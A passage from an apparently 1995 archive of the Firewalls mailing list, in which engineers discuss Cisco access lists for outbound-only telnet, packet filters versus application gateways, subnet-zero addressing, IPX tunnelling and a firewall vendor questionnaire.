My *humble* Thanks, Scott Surguine surguine@csn.net From firewalls-owner Fri Oct 13 17:00:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA18060 for firewalls-outgoing; Fri, 13 Oct 1995 16:56:08 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA18053 for ; Fri, 13 Oct 1995 16:55:57 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id QAA04443; Fri, 13 Oct 1995 16:53:59 -0700 From: Paul Ferguson Message-Id: <199510132353.QAA04443@lint.cisco.com> Subject: Re: Firewall1 Comparison To: sacherich@ppg.com (Sacherich, Larry) Date: Fri, 13 Oct 95 16:53:59 PDT Cc: firewalls@GreatCircle.COM, wherrman@strong-funds.com In-Reply-To: <199510131532.AA08563@gateway.ppg.com>; from "Sacherich, Larry" at Oct 13, 95 11:25 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Again, this is a purely subjective issue. I would suggest to you, however, that application gateways (proxies) used in conjunction _with_ packet filtering is even more effective.

- paul

>
> Walt,
>
> Every security book or white paper that I have read indicates
> that an application level gateway is the best form of security.
> It goes a step beyond just packet filtering. You would be well
> advised to at least talk to firewall vendors like ANS, TIS, and
> BorderWare.
>
> ANS 800-456-8267 info@ans.net http://www.ans.net/
> TIS 301-854-6889 avolio@tis.com http://www.tis.com/
> Net- 800-723-1166 sales@netpart.com http://www.netpart.com
> Partners
>
>
> Larry Sacherich
> sacherich@ppg.com
>
> Comments are my personal opinion, and not that of PPG Industries.
>

-- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:..
c i s c o S y s t e m s From firewalls-owner Fri Oct 13 17:43:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA19013 for firewalls-outgoing; Fri, 13 Oct 1995 17:32:48 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA19004 for ; Fri, 13 Oct 1995 17:32:44 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id RAA11440; Fri, 13 Oct 1995 17:29:43 -0700 From: Paul Ferguson Message-Id: <199510140029.RAA11440@lint.cisco.com> Subject: Re: Question: Telnet & Packet Filtering To: surguine@csn.net (Scott Surguine) Date: Fri, 13 Oct 95 17:29:42 PDT Cc: firewalls@GreatCircle.COM, surguine@teal.csn.net In-Reply-To: <199510132230.QAA11994@teal.csn.net>; from "Scott Surguine" at Oct 13, 95 4:30 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Do you _really_ want to block _all_ incoming traffic? Half of your services, figuratively speaking, will cease to function if you do so. Example(s):

o Do you rely on a service provider for secondary DNS? If yes, then you'll need to leave tcp/53 incoming open for zone transfers.

o Do you run FTP in PASV mode? If not, then you'll need to allow tcp ports > 1023 open for FTP connection back-channel data streams.

o Do you expect to receive e-mail? If so, then you'll need to allow tcp/25 to your mail host(s).

There are several other examples, but hopefully you see the point I am trying to make. Make sure this is _exactly_ what you want to do before you actually do it.

- paul

>
> I am trying to build a packet filter on a Cisco 2501 running IOS 10.2:
>
> I would like to allow telnet OUTGOING ONLY across the Cisco. Which is
> the best way to accomplish this?
>
> I) Scenario #1
>
> interface serial0
> ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
> ip access-group 100 in
>
> access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255
> established
>
> II) Scenario #2
>
> interface serial0
> ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
> ip access-group 100 in
>
> access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255
> gt 1023 established
>
> What is confusing me is this: I have mainly in the past only used
> router platforms that filtered on the outgoing interface. I believe
> the second Scenario to be the better of the two but would prefer
> a second opinion.
>

-- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Fri Oct 13 18:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA19354 for firewalls-outgoing; Fri, 13 Oct 1995 17:45:44 -0700 Received: from rugrat.glyphic.com (ns.glyphic.com [205.164.126.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA19347 for ; Fri, 13 Oct 1995 17:45:41 -0700 Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.28.1 #1) id m0t3ugX-000H9qC; Fri, 13 Oct 95 17:42 PDT X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 17:45:31 -0700 To: Scott Surguine From: markl@glyphic.com (Mark Lentczner) Subject: Re: Question: Telnet & Packet Filtering Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>I would like to allow telnet OUTGOING ONLY across the Cisco. Which is
>the best way to accomplish this?

>What is confusing me is this: I have mainly in the past only used
>router platforms that filtered on the outgoing interface.

The Cisco can filter both incoming and outgoing packets according to different access-lists.
And you need to do both to make things really secure. You could use:

interface serial0
ip address X.X.X.X m.m.m.m
ip access-group 100 out
ip access-group 101 in

access-list 100 permit tcp x.x.x.x m.m.m.m gt 1023 0.0.0.0 255.255.255.255 eq 23
access-list 101 permit tcp 0.0.0.0 255.255.255.255 eq 23 x.x.x.x m.m.m.m gt 1023 established

The restriction on return packets coming FROM port 23 is sort of
pointless: You have no control over what ports hackers can use on their
machines out on the Internet. They can easily send you packets
originating from port 23. So the incoming filter might as well be:

access-list 101 permit tcp 0.0.0.0 255.255.255.255 x.x.x.x m.m.m.m gt 1023 established

This will also mean that your incoming filter will work for most future
protocols you decide to allow your users to use (such as http).

If you believe that the kernels on the x.x.x.x machines will properly
reject packets for non-open connections (packets for which the ACK is
set, but no connection has been made) (a reasonable assumption -
Wizards: what do you think?), then you can simplify the incoming access
list:

access-list 101 permit tcp 0.0.0.0 255.255.255.255 x.x.x.x m.m.m.m established

However, I like the gt 1023 rule, as it ensures that nothing from the
outside can reach any servers accidentally running on x.x.x.x machines
no matter what the kernel or hacker does. (Servers that use ports less
than 1023 that is: I also treat port 6000 the same way.)

Technically, you don't need to assume that the outgoing port will be
greater than 1023: it is conceivable that some kernel implementation
would allow client connections on ports lower than 1023 (it is
configurable in Sun kernels!). After all, if your machine is making the
outgoing connection, why do you care what port number it is?
So you could simplify:

access-list 100 permit tcp x.x.x.x m.m.m.m 0.0.0.0 255.255.255.255 eq 23

Taking that a step further, you could allow anyone on x.x.x.x to
connect to any service they wanted:

access-list 100 permit tcp x.x.x.x m.m.m.m 0.0.0.0 255.255.255.255

It all depends on what your security policy is. These variants open
more opportunity for your x.x.x.x users, but they might be able to
wreak more havoc this way too! You also might be concerned about
limiting the abilities of the x.x.x.x machines lest they get broken
into.

Again - formulate your security policy and let it be your guide to
designing your filter.

- Mark L.

From firewalls-owner Fri Oct 13 19:03:31 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA21259 for firewalls-outgoing; Fri, 13 Oct 1995 18:44:09 -0700
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA21240 for ; Fri, 13 Oct 1995 18:44:01 -0700
Received: from fepco.com by relay1.UU.NET with SMTP id QQzlis02950; Fri, 13 Oct 1995 21:42:11 -0400 (EDT)
Received: from ryahda.fepco.com by fepco.com (4.1/SMI-4.1) id AA16556; Fri, 13 Oct 95 18:51:14 MST
Received: by ryahda.fepco.com (5.x/SMI-SVR4) id AA20061; Fri, 13 Oct 1995 18:38:59 -0700
Date: Fri, 13 Oct 1995 18:38:59 -0700
From: fepotts@fepco.com (Fred E Potts)
Message-Id: <9510140138.AA20061@ryahda.fepco.com>
To: dkaye@rds.com
Subject: Re: Firewall1 Comparison -Reply
Cc: Firewalls@GreatCircle.COM
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi, Doug,

My thinking on this subject is that the best way to set up a firewall
system is:

0. CSU/DSU
1. Filtering Gateway (packet filter router)
2. Application Gateway.
3. Harden the interior machines on an individual basis as much as
   possible (large shops will have problems with this because of
   ``social considerations'').
This type of setup is commonly known as a ``Screened Host Gateway,'' and
is considered to be reasonably secure. It is, of course, a ``Bastion
Host'' combined with a ``Filtering Gateway'' (packet filter).

The hardware configuration would be your router (something like a
Cisco), then a separate dedicated machine for the Application Gateway
(firewall), then your internal network.

As to whether this type of setup is overkill or not, that depends on
your attitude and considerations of company data, reputation, and time
and expense to rebuild your network in case of a breakin.

As to price, this type of system runs about $15K plus about $120 a
month for software upgrades. (Good computer systems are like airplanes
-- they don't come cheap.)

Regards...

Fred
__
fepotts@fepco.com
http://www.fepco.com/

----- Begin Included Message -----

From: Doug Kaye
Date: Fri, 13 Oct 1995 08:34:21 -0700
Subject: Re: Firewall1 Comparison -Reply

I'm seeing a lot of discussion on pack filters vs. application
gateways. Does it make sense to implement both? Is it too expensive or
overkill? If you implement both, where does the filter go -- on the
public side of the application gateway? Is it possible to run both on
the same hardware?
============================================================
Doug Kaye                  Rational Data Systems, Novato, CA
Tel:415-382-8400           FAX:415-382-8441    http://www.rds.com

----- End Included Message -----

From firewalls-owner Fri Oct 13 20:30:11 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA23233 for firewalls-outgoing; Fri, 13 Oct 1995 20:24:22 -0700
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA23226 for ; Fri, 13 Oct 1995 20:24:19 -0700
Received: from pm2-08.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA16471; Fri, 13 Oct 95 22:22:43 -0400
Date: Fri, 13 Oct 95 22:22:43 -0400
Message-Id: <9510140222.AA16471@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: gblolmxb@ibmmail.com
From: frankw@in.net (Frank Willoughby)
Subject: Re: Firewall Questionnaire
Cc: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mark,

Good beginning to your firewall questionnaire. FWIW, I have one which
is about @250-300 lines long (each line is a separate evaluation item).
It is a re-creation of a firewall evaluation checklist I made when I
evaluated all of the major players in the firewall arena.

To get a copy, feel free to e-mail me or (preferably) call me at:
(317) 573-0800.

Best Regards,

Frank

>
> I am looking at possible commercial firewall products as my employer
> may be getting a direct Internet connection soon. In order to help the
> selection process, I have sent a list of questions to several
> manufacturers and suppliers, which I list below, does anyone think I've
> missed anything out?
>
>
> It is expected that XXXXX would want to offer the following services
> to its employees:
>
> WWW access, FTP gets, outward bound Telnet, feed for an internal
> Newsgroup server.
>
> Please note that electronic mail (SMTP) is not desired - this is
> fulfilled via other channels. This raises the issue of a DNS - this
> has not yet been resolved, XXXX may look to the Internet Provider to
> supply this service.
>
>
> QUESTIONNAIRE
>
>
> 1. Would you describe your product as a:
>    a. A circuit firewall?
>    b. An application firewall?
>    c. A hybrid of the above?
>    d. Something else (please elaborate)?
>
> 2. Is your firewall a:
>    a. Software only solution?
>    b. A hardware and software solution?
>    c. Something else (please elaborate)?
>
> 3. On what hardware platform does your firewall run on?
>
> 4. What operating system does your firewall run on?
>
> 5. What physical network topology does the hardware support:
>    a. Ethernet?
>    b. Token ring?
>    c. Something else (please elaborate)?
>
> 6. How is the firewall managed/configured? (e.g. by use of telnet,
>    serial port etc.)
>
> 7. What sort of user interface is used to manage the firewall?
>
> XXXXX would want to deny access to many of the TCP and UDP protocol
> suite at the router using packet filtering. If this were not possible,
> the following protocols should be denied access by the firewall.
> Please indicate, for each protocol, whether this is possible, and
> whether the firewall itself will respond to them (e.g. incoming
> Telnet).
>
> 8. ICMP
>
> 9. RIP.
>
> 10. SMTP.
>
> 11. Incoming Telnet.
>
> 12. All incoming RPC type protocols (NFS, NIS)
>
> 13. TFTP.
>
> 14. FTP (incoming).
>
> 15. all 'r' commands.
>
> 16. MBone and other IP over IP protocols.
>
> 17. X11.
>
> 18. Is a 'sanitised' version of finger supported?
>
> 19. Is there a proxy service for FTP?
>
> 20. Is there a proxy service for Telnet?
>
> 21. Is there a proxy service for NNTP?
>
> 22. Is there a proxy service for HTTP?
>
> 23. What sort of bandwidth of Internet connection can your firewall
>     handle?
>
> 24. How many concurrent IP circuits can your product handle?
>
> 25. XXXX operates on a commercial basis internally, and may wish to
>     charge departments and users for their usage. Does your product have
>     this facility built-in?
>
> 26. How does your product react to potential security breaches?
>
> 27. Does your Firewall assist in preventing outward bound misuse?
>
> 28. Do you offer security consultancy? If so, at what cost?
>
> 29. Do you have any reference sites whom XXXX may contact in the
>     future?
>
> 30. What would a suitable solution cost, assuming a 64Kbps leased line
>     connection? What sort of maintenance and support is offered and at
>     what cost?
>
> 31. Do you have any independent evaluations (e.g. Magazine review) of
>     your product?
>
> 32. Is there anything else you wish to tell us about your firewall
>     product(s)?
>
>
> Mark.
>
>

From firewalls-owner Fri Oct 13 21:43:17 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24499 for firewalls-outgoing; Fri, 13 Oct 1995 21:36:24 -0700
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24490 for ; Fri, 13 Oct 1995 21:36:21 -0700
Received: from pm4-13.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA18815; Fri, 13 Oct 95 23:34:41 -0400
Date: Fri, 13 Oct 95 23:34:41 -0400
Message-Id: <9510140334.AA18815@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Doug Kaye
From: frankw@in.net (Frank Willoughby)
Subject: Re: Firewall1 Comparison -Reply
Cc: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make
>sense to implement both?

Yes

>Is it too expensive or overkill?

Neither

>If you implement both, where
>does the filter go -- on the public side of the application gateway?
Explanation follows

>Is it possible to run both
>on the same hardware?
>

Yes

A Packet Filter can be as cheap as a little over a grand. Many are
routers (Cisco is a good example of a high-quality router). An
Application Gateway filters packets and applications (simply stated for
brevity).

Having managed a Packet Filter (not a router) *and* an Application
Gateway, I guess I can say I speak from experience. FWIW, the Packet
Filter was a DSG (Digital Security Gateway).

Packet filters are good cheap fixes for low-risk security environments.
Application Gateways are ideal for high-risk environments. If you are
securing two internal LAN segments, the packet filter may be the best
approach for you. I would consider the Internet to be a very high risk
environment.

There are many good packet filters out there. However, I'm a firm
believer in using the right tool for the right job. IMO, the only
firewall I would use for protecting valuable data from the Internet is
an Application Gateway which uses heavy authentication and very strong
encryption. The above assumes of course that you are trying to protect
valuable data or your corporation.

RE: Configuration question

Regarding the configuration question, I personally would have the
router on the Internet side be set up so that it only allows services
which the firewall will pass judgement on and block everything else.
This has the advantages of redundant security in the event that someone
makes a mistake in the rules of the firewall or the router - and - it
reduces the load on the firewall (increasing throughput). Of course,
the router on the inside could also include these rules for even more
redundant security.

Rathole avoidance suggestion

Also, rather than go down the road of Packet Filter vs. Application
Gateway, please feel free to send me mail & we can discuss this subject
off-line. If you want to research the subject further, I will be happy
to supply you with references.
Best Regards,

Frank

PS - FWIW, I agree completely with Fred from TIS.

>============================================================
>Doug Kaye                  Rational Data Systems, Novato, CA
>Tel:415-382-8400           FAX:415-382-8441    http://www.rds.com
>

From firewalls-owner Sat Oct 14 08:30:46 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01564 for firewalls-outgoing; Sat, 14 Oct 1995 08:24:51 -0700
Received: from ic.net (falcon.ic.net [152.160.101.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA01557 for ; Sat, 14 Oct 1995 08:24:48 -0700
Received: by ic.net (Smail3.1.28.1 #6) id m0t48QK-000ghlC; Sat, 14 Oct 95 11:22 WET DST
Date: Sat, 14 Oct 1995 11:22:56 -0400 (EDT)
From: Mark Bell
To: Yannick Gravel
cc: firewalls@greatcircle.com
Subject: Re: First and last subnet ???
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The subnet value - that is the portion of the address that is reserved
for the subnet - cannot be all ones or all zeroes.

i.e.

net address       135.148.  0.  0
default netmask   255.255.  0.  0   (class B)
subnet mask         0.  0.255.  0
                  ---------------
netmask           255.255.255.  0

The third byte cannot be 'all ones' or 'all zeroes' (referring to the
binary subnet value - in this case what's in the 3rd byte).

255 (decimal) = 1111 1111 (binary), and obviously
  0 (decimal) = 0000 0000 (binary)

The subnets 135.148.255.0 and 135.148.0.0 cannot be used.

If you have a cisco router, you may use the 135.148.0.0 subnet, if you
set the 'subnet zero' parameter - see the manual - but note that other
routers on the network may not forward the traffic to 135.148.0.0 if
they have a subnet mask of 255.255.255.0 set for that net.

The cause of the problem is RFC950, (subnetting ip networks) which was
written in the days when net addresses were plentiful.
If you have a class C address - say 198.143.35.0, and you subnet with a
netmask of 255.255.255.192 (0xff.ff.ff.c0), you theoretically have the
following subnets available:

198.143.35.0
198.143.35.64
198.143.35.128
198.143.35.192

Without the 'subnet zero' feature, subnets 198.143.35.0 and
198.143.35.192 cannot be used. You just lost 50% of the address space.
Another feature of IP!

There are other routers with the 'subnet zero' feature available, but I
don't have a list available.

Hope this helps.

Mark
Marol Consulting

On Wed, 11 Oct 1995, Yannick Gravel wrote:

> Hi Net&Sys Security people,
>
> Something that everybody is talking about, but not everybody
> is saying the same thing about subnetting:
>
> Yes, everybody agrees that we lose the first and last host of
> each subnet for net.iding and broadcasting.
>
> But, some are saying that I can use all subnets; but others are
> saying that we lose the first and last subnet...
>
> Whose truth is true..
>
> Thanks..
>
> Yannick Gravel
> System administrator -- yannick.gravel@planet-int.net
>

From firewalls-owner Sat Oct 14 09:00:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA01733 for firewalls-outgoing; Sat, 14 Oct 1995 08:47:29 -0700
Received: from ic.net (falcon.ic.net [152.160.101.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA01726 for ; Sat, 14 Oct 1995 08:47:26 -0700
Received: by ic.net (Smail3.1.28.1 #6) id m0t48dD-000ghnC; Sat, 14 Oct 95 11:36 WET DST
Date: Sat, 14 Oct 1995 11:36:15 -0400 (EDT)
From: Mark Bell
To: Danny Cox
cc: firewalls@greatcircle.com
Subject: Re: Modems and IPX tunnelling
In-Reply-To: <6373.9510131028@gmap.leeds.ac.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I would suggest that you do your ipx tunnelling outside the firewall -
put your Netware Server between the firewall router and your provider's
router (DMZ).
Allow IPX through the firewall router and block it through the
provider's router. Allow IP/UDP and IP/TCP through the provider's
router and block IP/UDP through the firewall router.

Should be safe enough....

Mark
Marol Consulting

On Fri, 13 Oct 1995, Danny Cox wrote:

> Ok .. things are clarifying further for me. I understand that in order
> to use Novell's IPX tunnelling within IP it has to be run using UDP.
>
> Given general attitudes towards UDP through firewalls I'm a little
> troubled by this. Would the general consensus here be to not do it?
> Would there be easy ways of improving this ? eg have some proxyish sort of
> thing which accepts UDP and squirts out TCP for passing thro' the fw?
>
> Furthermore .. what are the implications of letting IPX through. Should
> this traffic be filtered in any way ? If it makes any difference, and I'm
> not at all convinced it does, our plan will be to run it through modems
> and/or ISDN. I guess that will have to go through some sort of Terminal
> Server. I suppose if we do let IPX through like this, then we could
> effectively use the Internet as our connection medium for an IPX based
> VPN?? Actually, thinking on .. we plan to connect our LANs between this
> site and our new one using Kilostream links. We'll use ISDN as a backup.
> I think there are thoughts about using a product by Novell - I forget its
> name. I suspect that won't combine with the firewall too well. So my
> idea would be to firewall the lot and, as I say, tunnel the IPX through
> it.
>
> Any comments ?
> Thanks ..
> Danny
>

From firewalls-owner Sat Oct 14 10:30:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA02678 for firewalls-outgoing; Sat, 14 Oct 1995 10:22:22 -0700
Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA02671 for ; Sat, 14 Oct 1995 10:22:17 -0700
Received: by wabash.iac.net id NAA14503; Sat, 14 Oct 1995 13:17:19 -0400
Date: Sat, 14 Oct 1995 13:16:59 -0400 (EDT)
From: Carl Jolley
To: Danny Cox
cc: firewalls@GreatCircle.COM
Subject: Re: Modems and IPX tunnelling
In-Reply-To: <6373.9510131028@gmap.leeds.ac.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 13 Oct 1995, Danny Cox wrote:

> Ok .. things are clarifying further for me. I understand that in order
> to use Novell's IPX tunnelling within IP it has to be run using UDP.
>
> Given general attitudes towards UDP through firewalls I'm a little
> troubled by this. Would the general consensus here be to not do it?
> Would there be easy ways of improving this ? eg have some proxyish sort of
> thing which accepts UDP and squirts out TCP for passing thro' the fw?
>
> Furthermore .. what are the implications of letting IPX through. Should
> this traffic be filtered in any way ? If it makes any difference, and I'm
> not at all convinced it does, our plan will be to run it through modems
> and/or ISDN. I guess that will have to go through some sort of Terminal
> Server. I suppose if we do let IPX through like this, then we could
> effectively use the Internet as our connection medium for an IPX based
> VPN?? Actually, thinking on .. we plan to connect our LANs between this
> site and our new one using Kilostream links. We'll use ISDN as a backup.
> I think there are thoughts about using a product by Novell - I forget its
> name. I suspect that won't combine with the firewall too well.
> So my
> idea would be to firewall the lot and, as I say, tunnel the IPX through
> it.
>
> Any comments ?
> Thanks ..
> Danny
>

Although it may turn out to be trivial compared to other concerns, you
may want to consider performance and bandwidth requirements. Have you
considered Novell's IP as an alternative to tunnelling IPX? Perhaps
that is the Novell product whose name you forgot.

In re: ISDN, I don't believe that it matters that the higher level
protocol is IPX or IP. More than likely, you will be encapsulating the
lower level packets in PPP anyway.

**** cjolley@iac.net ****
All opinions are my own and not necessarily those of my employer ****

From firewalls-owner Sat Oct 14 10:43:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA02770 for firewalls-outgoing; Sat, 14 Oct 1995 10:40:15 -0700
Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA02763 for ; Sat, 14 Oct 1995 10:40:12 -0700
Received: by wabash.iac.net id NAA14730; Sat, 14 Oct 1995 13:37:10 -0400
Date: Sat, 14 Oct 1995 13:37:08 -0400 (EDT)
From: Carl Jolley
To: Scott Surguine
cc: firewalls@GreatCircle.COM, surguine@teal.csn.net
Subject: Re: Question: Telnet & Packet Filtering
In-Reply-To: <199510132230.QAA11994@teal.csn.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you only have two interfaces on your internet router, i.e. to your
internal network and the other a serial interface to the Internet or a
LAN interface to an isolated subnet that connects to the Internet, then
it doesn't matter between filtering input vs. output since the input at
both ports is output at the other. Filtering input on the port that
connects to the Internet is the same as filtering output at the port
that connects to your internal network. The logical reverse holds true
for output filtering.
**** cjolley@iac.net ****
All opinions are my own and not necessarily those of my employer ****

On Fri, 13 Oct 1995, Scott Surguine wrote:

>
> Hello Folks,
>
>
> I am trying to build a packet filter on a Cisco 2501 running IOS 10.2:
>
>
> I would like to allow telnet OUTGOING ONLY across the Cisco. Which is
> the best way to accomplish this?
>
>
>
> I) Scenario #1
>
> interface serial0
> ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
> ip access-group 100 in
>
>
> access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255
> established
>
>
>
> II) Scenario #2
>
> interface serial0
> ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
> ip access-group 100 in
>
> access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255
> gt 1023 established
>
>
>
>
>
> What is confusing me is this: I have mainly in the past only used
> router platforms that filtered on the outgoing interface. I believe
> the second Scenario to be the better of the two but would prefer
> a second opinion.
>
>
>
> My *humble* Thanks,
>
>
> Scott Surguine
> surguine@csn.net
>

From firewalls-owner Sat Oct 14 10:57:27 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA02789 for firewalls-outgoing; Sat, 14 Oct 1995 10:42:29 -0700
Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA02782 for ; Sat, 14 Oct 1995 10:42:25 -0700
Received: by wabash.iac.net id NAA14758; Sat, 14 Oct 1995 13:40:01 -0400
Date: Sat, 14 Oct 1995 13:39:58 -0400 (EDT)
From: Carl Jolley
To: Paul Ferguson
cc: Scott Surguine , firewalls@GreatCircle.COM, surguine@teal.csn.net
Subject: Re: Question: Telnet & Packet Filtering
In-Reply-To: <199510140029.RAA11440@lint.cisco.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 13 Oct 1995, Paul Ferguson wrote:

>
> Do you _really_ want to block _all_ incoming traffic?
> Half of your
> services, figuratively speaking, will cease to function if you do so.
>
> Example(s):
>
>  o Do you rely on a service provider for secondary DNS? If yes,
>    then you'll need to leave tcp/53 incoming open for zone transfers.
>
>  o Do you run FTP in PASV mode? If not, then you'll need to allow
>    tcp ports > 1023 open for FTP connection back-channel data
>    streams.
>
>  o Do you expect to receive e-mail? If so, then you'll need to
>    allow tcp/25 to your mail host(s).
>

Perhaps he's planning on implementing write-only e-mail. (:-D)

>
> There are several other examples, but hopefully you see the point
> I am trying to make. Make sure this is _exactly_ what you want to
> do before you actually do it.
>
> - paul
>
> >
> > I am trying to build a packet filter on a Cisco 2501 running IOS 10.2:
> >
> > I would like to allow telnet OUTGOING ONLY across the Cisco. Which is
> > the best way to accomplish this?
> >
> > I) Scenario #1
> >
> > interface serial0
> > ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
> > ip access-group 100 in
> >
> > access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255
> > established
> >
> > II) Scenario #2
> >
> > interface serial0
> > ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X
> > ip access-group 100 in
> >
> > access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255
> > gt 1023 established
> >
> > What is confusing me is this: I have mainly in the past only used
> > router platforms that filtered on the outgoing interface. I believe
> > the second Scenario to be the better of the two but would prefer
> > a second opinion.
> >
>
> --
> Paul Ferguson                  ||        ||
> cisco Systems                  ||        ||
> Consulting Engineering        ||||      ||||
> pferguso@cisco.com        ..:||||||:..:||||||:..
>                         c i s c o S y s t e m s
>

**** cjolley@iac.net ****
All opinions are my own and not necessarily those of my employer ****

From firewalls-owner Sat Oct 14 13:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04485 for firewalls-outgoing; Sat, 14 Oct 1995 12:50:49 -0700
Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA04478 for ; Sat, 14 Oct 1995 12:50:47 -0700
Received: (pst@localhost) by puli.cisco.com (8.6.8+c/8.6.5) id MAA14503; Sat, 14 Oct 1995 12:48:45 -0700
Date: Sat, 14 Oct 1995 12:48:45 -0700
From: Paul Traina
Message-Id: <199510141948.MAA14503@puli.cisco.com>
To: pferguso@cisco.com (Paul Ferguson)
Cc: firewalls@greatcircle.com
In-Reply-To: pferguso@cisco.com's message of 13 Oct 1995 04:34:35 PST
Subject: Re: First and last subnet ???
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> It depends. If you are using a classless routing protocol, you can
> certainly use these subnets. If you are using a classful routing
> protocol, then it depends on the vendor platform and if they have a
> mechanism that supports explicit use of these subnets.
>
> A word of caution is needed, however, since using them is not RFC
> compliant. :-)
>
> - paul

Actually, I got that changed in router requirements RFC. We (the IETF)
officially deprecated the reserved status of the all-zeros and all-ones
subnets in a "classless" environment. So, it's official now.

We currently warn people if they try to assign an interface to an "all
zeros" subnet because most other router vendors don't properly handle
classFUL routing protocols like RIP in this situation...in fact, we
can't guarantee that we'll always do exactly the right thing (it can be
hard to figure out).

To disable the warning, just configure "ip subnet-zero" and the router
will let you configure subnet zero addresses. (hmmm, I should hang that
on ip classless too...type type type...).
- other paul

From firewalls-owner Sat Oct 14 14:13:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05185 for firewalls-outgoing; Sat, 14 Oct 1995 14:04:53 -0700
